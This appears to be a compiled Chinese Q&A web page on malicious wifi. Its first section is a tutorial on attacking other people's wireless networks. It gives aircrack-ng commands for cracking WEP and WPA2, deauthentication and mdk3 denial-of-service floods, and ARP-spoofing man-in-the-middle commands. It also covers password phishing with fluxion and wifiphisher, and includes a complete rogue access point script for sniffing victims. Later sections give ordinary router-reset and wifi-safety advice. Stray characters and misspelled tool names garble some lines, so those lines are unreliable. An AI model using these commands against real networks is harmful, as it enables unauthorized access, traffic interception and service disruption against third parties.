惡意無線網路

C. 怎麼攻擊別人wifi

1.保密性
我們攻擊WIFI的第一個思路就是從保密性出發，我們希望從無線系統中獲取用戶的明文數據。首先，我們知道WIFI的的認證加密主要有以下四種方式：OPEN（無加密）、WEP（RC4）、WPA（TKIP）、WPA2（CCMP）。
OPEN的WIFI沒有採取認證加密措施，任意用戶均可鏈接WIFI，用戶數據在BSS（基本服務集）中明文傳輸，惡意用戶沒有任何門檻就可連接，然後通過中間人攻擊即可獲取用戶的數據（SSL、SSH等需要其他工具）。如下圖所示：
WEP、WPA、WPA2認證加密模式的WIFI需要破解獲取密碼，然後通過中間人或直接嗅探的方式獲取用戶明文數據。步驟就不詳述了，WEP抓取IVS包，WPA/WPA2抓取handshake包。
WEP大概如下：
airomp-ng --ivs -w /workspace/sniff/airmon --bssid AP的MAC -c AP的chanle wlan1mon #捕獲ivs數據包
aireplay-ng -3 -b 目標AP的MAC -h 某一個連接該AP的station的MAC wlan1mon #發送ARP包獲取加速獲取ivs
aircrack-ng /workspace/sniff/airmon02.ivs
WPA/WPA2大概如下：
airomp-ng -w /workspace/sniff/airmon-wpa2 --bssid 目標AP的MAC -c AP所在chanle wlan1mon #嗅探無線數據，抓取handshake包
aireplay-ng -0 5 -a 目標AP的MAC -c 某一連接AP的station的MAC wlan1mon #發送deauth包，更快的獲取handshake
aircrack-ng -w 你的字典文件備老盯 /workspace/sniff/airmon-wpa2.cap #破解wpa2密碼
密碼破解成功後即可連接AP，通過中間人的方式獲取用戶仿和明文數據，或者直接用wireshark抓取加密包，然後通過airdecap-ng工具解密，然後用wireshark讀取已經解密的數據包。
破解WPA、WPA2不一定成功，取決於你字典是否強大，此時我們可以想辦法誘騙用戶主動輸入WIFI密碼，比如我們創建一個和目標AP具有同樣ESSID的軟AP，用戶可以連接上，單在瀏覽網頁時會彈出一個虛假的認證頁面，告訴用戶必須輸入WIFI的密碼，用戶只要輸入密碼我們即可獲取。可以利用fluxion、wifiphisher等工具實現。
wifiphisher將用戶輸入的密碼當做WIFI的密碼，但此密碼並沒有去驗證，如果用戶輸入錯誤，也會提示出該密碼。
而fluxion會將用戶輸入的密碼與handshake校驗，成功方認為獲取到密碼。
2.可用性
通過使目標用戶無法使用WIFI來破壞無線系統的可用性，通常通過DOS攻擊來實現，比如發送大量的deauth包來迫使用戶station與AP解除認證、連接。
aireplay -0 100 -a 目標AP的MAC -c攻擊的station的MAC wlan1mon #發送大量的deauth包，迫使目標station無法連接AP
mdk3 wlan1mon a -a 攻擊AP的MAC #mdk3可以偽造大量的station與AP連接，從而耗盡AP的資源造成DOS攻擊
3.真實性
（1）惡意用戶進入無線系統後，可通過中間人攻擊獲取或修改用戶數據。
ARP欺騙或DNS欺騙，ettercap工具非常方便。下面採用mitmf工具通過ARP欺騙將目標瀏覽網頁中的所有圖片上下顛倒。
mitmf -i wlan0 --spoof --arp --gateway 192.168.2.1 --target 192.168.2.1 --upsidedownternet
通過driftnet工具抓取目標瀏覽網頁含桐時的圖片
driftnet -i wlan0
當然還可以利用中間人攻擊做很多事情，比如獲取cookie，嵌入js，結合beef進一步攻擊等等。。。
（2）偽造AP進行釣魚攻擊
airbase -ng -e airmon wlan1mon #創建釣魚熱點
然後通過下面的腳本開啟dhcp伺服器（必須先安裝isc-dhcp-server），開啟路由，開啟系統轉發，開啟防火牆nat等。
1 #!/bin/bash 2 3 echo '配置釣魚熱點...' 4 5 service isc-dhcp-server stop 6 rm /var/lib/dhcp/dhcpd.leases 7 touch /var/lib/dhcp/dhcpd.leases 8 9 ifconfig at0 up10 ifconfig at0 10.0.0.1 netmask 255.255.255.011 route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.112 sysctl net.ipv4.ip_forward=113 14 dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at015 echo '等待啟動dhcp伺服器...'16 sleep 517 service isc-dhcp-server start18 19 iptables -F20 iptables -t nat -F21 22 #iptables -P FORWARD ACCEPT23 iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE

此時用戶可以不用密碼即可連接airmon熱點，並可以上網，但此時可以通過嗅探at0網卡獲取用戶數據。
4.完整性
篡改用戶數據，在WIFI攻擊這塊貌似用處不大。
5.不可抵賴性

D. 無線網路連上了但被人惡意限制了，拒絕訪問，怎麼辦

可以通過恢復出廠設置然後登陸後台重新設置密碼來解決
第一：在路由器的後面有一個針孔（這個針孔就是路由器恢復出廠設置的按鈕，用針插進去10秒以上路由器就會自動的恢復出廠設置並清除之前設置好的所有內容包括路由器的登錄用戶名和密碼）

第二：登錄路由器後台並設置好密碼之後如何設置路由器的有效上網參數？

第三：在經過前半部分的向導設置好路由器的登錄密碼之後會進去進入到「上網方式」的設置（這個根據你的運營商所提供的數據進行設置，如果你的運營商是撥號上網的那麼必需選撥號才能正常連接到互聯網上）

如何設置路由器的WIFI名稱和WIFI帳號密碼？

第四步：完成寬頻帳號的密碼設置之後會自動進入到WIFI的設置，「無線名稱」和「無線密碼'（這個就是設置WIFI帳號和WIFI密碼的可隨意填寫方便記住就可以）

這樣整個路由器的設置就完成了

E. 不安全無線網路什麼意思對電腦資料有危險嗎

指連接的無線網路沒有加密，存在風險。

正常的無線網路信號的傳播都要以wap、wep等方式加密，這樣設備發送的數據就不能被別人截獲破解，而不設置密碼的無線網路是不安全的，容易存在資料泄露、密碼被盜等安全風險。

另外未加密的wifi可能是黑客惡意布置的陷阱，主要是用來獲取用戶的信息，如果手機自動搜索並連上，手機上的一些重要數據和信息就會被黑客截獲，手機上未經加密處理的用戶名和賬戶信息及賬戶密碼就會不知不覺得泄露，從而被黑客竊取財產。

WIFI雖然給上網提供了便利，但也為安全留下隱患。發現免費WIFI千萬不要隨便登錄，這可能是黑客用來入侵你手機的工具。

江西一名男子曾使用沒有設置密碼就能直接登錄的免費WIFI，並用手機輸入自己網銀卡號密碼，結果導致賬戶3萬多元被轉走。

(5)惡意無線網路擴展閱讀

多種方法增強WIFI安全

1、公共場合連接WiFi時請同商家確認好WiFi名稱。

2、沒有密碼的公共WiFi慎用。

3、使用支付APP時，盡量使用運營商的4G網路。

4、在辦公網路架設無線路由器必須經過公司批准並進行安全安裝。

5、建議隱藏SSID(服務集標識)，綁定接入設備的MAC地址。

6、日常不用WiFi時關閉手機和筆記本電腦的無線區域網功能，以防自動連接惡意WiFi。

F. 如何查看自己的無線WiFi是否有被別人惡意盜用

方法一：路由器查詢法
打開瀏覽器，在地址欄輸入IP:192.168.1.1進入無線路由器的管理界面。
進入後會顯示輸入賬號密碼界面，賬號一般是admin，密碼為admin。
登錄成功界面。
點擊左側的「無線設置」，點擊「主機狀態」可以看到無線連接的主機列表。
END
方法二：騰訊電腦管家查詢法
打開騰訊電腦管家。
在騰訊電腦管家右下角，點擊「工具箱」，進入工具列表界面。
在「安全上網」區域選擇點擊「無線安全助手」。
點擊「立即啟用」，進入網路列表顯示界面。
檢測無線網路，顯示無線連接的主機列表。
END
方法三：網路測試法
當你感覺到自己的無線網網速很慢，就說明你的Wifi有可能已經在被盜用中。
有時間還老掉線，就說明你的Wifi有可能已經在被盜用中。
檢查你的路由器。請注意觀察路由器上面一系列狀態指示燈，其中有電源燈，網路連接燈，無線連接燈。如果無線燈不亮，家裡所有的電腦都無法上網，那麼可以肯定沒人盜用。